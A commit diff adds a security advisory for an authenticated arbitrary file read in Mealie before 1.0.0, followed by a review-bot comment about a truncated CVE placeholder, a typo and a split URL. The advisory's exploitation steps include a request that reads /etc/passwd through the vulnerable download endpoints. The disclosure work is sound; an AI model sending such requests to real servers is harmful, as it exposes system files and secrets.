Commit 3c6422b

add advisory
1 parent cff6c3d commit 3c6422b

1 file changed

+31
-0
lines changed

Lines changed: 31 additions & 0 deletions
@@ -0,0 +1,31 @@
1+
---
2+
title: "Authenticated Arbitrary File Read in Mealie"
3+
date: 2024-01-29
4+
tags:
5+
- "arbitrary file read"
6+
advisory: true
7+
origin:
8+
cves:
9+
- CVE-2024-
10+
ghsas:
11+
---
12+
# Description
13+
Mealie before version 1.0.0 is vulnerable to authenticated arbitrary file read due to improper validation of the path in the `/api/recipes/bulk-actions/export/download` and `/api/utils/download` endpoints.
14+
15+
# Explotation
16+
1. Fetch a valid JWT token from the URL:
17+
`http://Mealie-domain/api/recipes/bulk-actions/export/download?p
18+
ath=%2Fetc%2Fpasswd`
19+
2. Download the file using the JWT token provided:
20+
`http://Mealie-domain/api/utils/download?token=<TOKEN>`
21+
22+
# Impact
23+
Any authenticated user can generate an API token and thus access the API. Using this
24+
vulnerability, an authenticated attacker can read arbitrary files from the server leading to
25+
different impacts from confidentiality to RCE via secrets/keys exfiltration.
26+
27+
# Mitigation
28+
Upgrade Mealie to version `1.0.0` or later
29+
30+
# References
31+
* [Pull request](https://github.com/mealie-recipes/mealie/pull/2867)
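Review bot: the `cves` entry on line 9 of the new file is a truncated placeholder (`- CVE-2024-`) and the `origin` and `ghsas` keys on lines 7 and 10 are left empty; the front matter will be parsed as published metadata, so either fill in the assigned identifiers or omit the keys until they are known, rather than shipping a half-formed CVE ID. Two smaller points in the same hunk: the heading `# Explotation` on line 15 should read `# Exploitation`, and the inline-code URL in step 1 is split across lines 17 and 18 (`...download?p` / `ath=%2Fetc%2Fpasswd`), which breaks the backtick span in rendered Markdown and should be joined onto one line. The Mitigation section on line 28 could also cite the fixing pull request that is already listed under References, so readers can confirm which change closes the path-validation gap in the two endpoints named in the Description.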
